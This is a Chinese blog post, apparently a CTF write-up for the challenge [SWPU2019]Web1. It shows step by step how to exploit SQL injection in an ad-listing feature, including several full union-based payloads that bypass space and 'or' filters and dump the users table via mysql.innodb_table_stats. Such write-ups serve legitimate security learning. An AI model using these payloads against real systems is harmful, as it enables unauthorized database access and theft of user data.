[SWPU2019]Web1

最新推荐文章于 2022-03-23 13:04:02 发布

Sk1y

最新推荐文章于 2022-03-23 13:04:02 发布

阅读量500

点赞数

分类专栏： CTF刷题记录文章标签： CTF web

本文链接：https://blog.csdn.net/RABCDXB/article/details/115842376

版权

CTF刷题记录专栏收录该内容

148 篇文章 18 订阅

订阅专栏

考查点：无列名注入，mysql.innodb_table_stats

题目分析：

首先打开容器，是个关于登录的界面，当时第一眼就认为是sql注入，后来发现不是，啪啪打脸。

随便注册账号（但是用户名不能是admin），然后登录

有广告信息管理功能，也就是可以发广告，这个地方存在sql注入漏洞。

经过测试，发现了注入点

查看广告详情就可以看到出现了sql报错

判断列数

因为过滤了or和空格，所以order by和空格都无法使用，并且information.schema等都无法使用。

但是可以使用union select 来代替order by 进行判断列数，同时也可以使用/**/代替空格

121'/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22'

根据回显，得到回显位2和3

得到表名

但是本题，过滤了or，那么该怎么进行注入呢？

网上有些wp使用sys.schema_auto_increment_columns ，但是在buuoj上没有这个库，而且sys一般是管理员权限才能够使用，强行使用就会是下面的结果。

但是可以通过mysql.innodb_table_stats来进行获取表名，如下

121'/**/union/**/select/**/1,2,(select/**/group_concat(table_name)/**/from/**/mysql.innodb_table_stats),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22'

得到表名

但是因为or被过滤，所以正常的联合注入行不通

查字段值

所以需要用到无列名注入，关于无列名注入的知识参考链接：[SWPU2019]Web1

注意这个时候查的是广告名，group_concat(a)

121'/**/union/**/select/**/1,2,(select/**/group_concat(a)/**/from/**/(select/**/1,2/**/as/**/a,3/**/union/**/select*from/**/users)bbb),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22'

查广告内容，

payload:

121'/**/union/**/select/**/1,2,(select/**/group_concat(b)/**/from/**/(select/**/1,2,3/**/as/**/b/**/union/**/select/**/*/**/from/**/users)bbb),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22'

或者

121'/**/union/**/select/**/1,2,(select/**/group_concat(b)/**/from/**/(select/**/1,2/**/as/**/a,3/**/as/**/b/**/union/**/select*from/**/users)bbb),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22'

回显